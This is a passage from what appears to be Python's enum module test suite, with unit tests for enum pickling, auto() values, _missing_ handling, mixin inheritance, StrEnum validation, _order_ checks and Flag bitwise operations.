NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_init_subclass(self):
class MyEnum(Enum):
def __init_subclass__(cls, **kwds):
super(MyEnum, cls).__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 'one'
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
@unittest.skipUnless(
sys.version_info[:2] == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'Perm.R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'Perm.R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
